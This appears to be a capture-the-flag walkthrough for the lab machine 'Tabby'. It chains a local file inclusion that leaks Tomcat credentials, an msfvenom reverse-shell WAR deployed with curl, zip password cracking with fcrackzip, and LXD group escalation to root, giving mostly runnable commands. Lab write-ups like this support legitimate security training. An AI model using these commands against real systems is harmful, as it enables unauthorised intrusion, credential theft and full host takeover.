Tabby Walkthrough

----------------------------------------
Enumerating port 80 we see a new subdomain megahosting.htb .
Add it to your host file at /etc/hosts

10.10.10.194 tabby.htb megahosting.htb

Foothold
----------------------------------------
There is an lfi at http://megahosting.htb/news.php?file=
So we can see by doing something like http://megahosting.htb/news.php?file=../../../../../etc/hosts
we get directory traversal.

Looking at port 8080 we find it's tomcat9 and it mentions /etc/tomcat9/tomcat-users.xml has user
info. But it returns nothing , so we need the correct path.

After some research we find the correct path is /usr/share/tomcat9/etc/tomcat-users.xml

So just do http://megahosting.htb/news.php?file=../../../../../usr/share/tomcat9/etc/tomcat-
users.xml and get the creds
```
<user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>

```
using the above we can access the gui for host manager.

Reverse Shell
------------------------------------------
Tomcat can let us gain rev shell via uploading our payload as .war file. We can use curl to upload
it to the webroot.

First craft the payload with msfvenom:-

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.X.X LPORT=1234 -f war > payload.war

```
To upload just do

```
curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file payload.war
"http://10.10.10.194:8080/manager/text/deploy?path=/payload.war"

```
Set up listener with nc -lvnp 1234 and go to tabby.htb:8080/payload.war and you should get a reverse
shell.

To upgrade tty just do python3 -c 'import pty; pty.spawn("/usr/bin/bash")'

Privesc to User Ash

------------------------------------------
Enumerating we find a zip file belonging to ash on /var/www/html/files/backup_<somenumber>.zip
(sorry don't remember the correct name)

so we copied it locally by base64 backupfilename.zip and on our local machine echo "<paste
base64code>"|base64 -d >backup.zip

We see it asks for password , so we can bruteforce it via fcrackzip

```
fcrackzip -v -D -u -p ./rockyou.txt backup.zip

```
which returns us the creds admin@it admin@it

Testing it via su ash we get access to ash and get the user.txt

Privesc to Root
-------------------------------------------------
We see that ash is part of lxd group. So according to article https://www.hackingarticles.in/lxd-
privilege-escalation/ we just follow the steps and get root .

On your local machine do,

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

You will get a tar.gz file. Set up http server and copy it to the remote machine

On the remote machine,

First add you ssh pub key to /home/ash/.ssh/authorized_keys

echo "<your public key here>">>authorized_keys

Then ssh with ssh ash@tabby.htb

Once logged in Go to any dir you have write access to and do

```
wget yourip/filename.tar.gz

```
Then just do the following in order

```
lxc image import ./yourfilename.tar.gz --alias myimage
lxc image list (this should show you your image got loaded)
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

cd /mnt/root
cd /root/
cat root.txt

```
Also you can get the root's rsa key from /root/.ssh/id_rsa

----------------------------------------------------------------------------------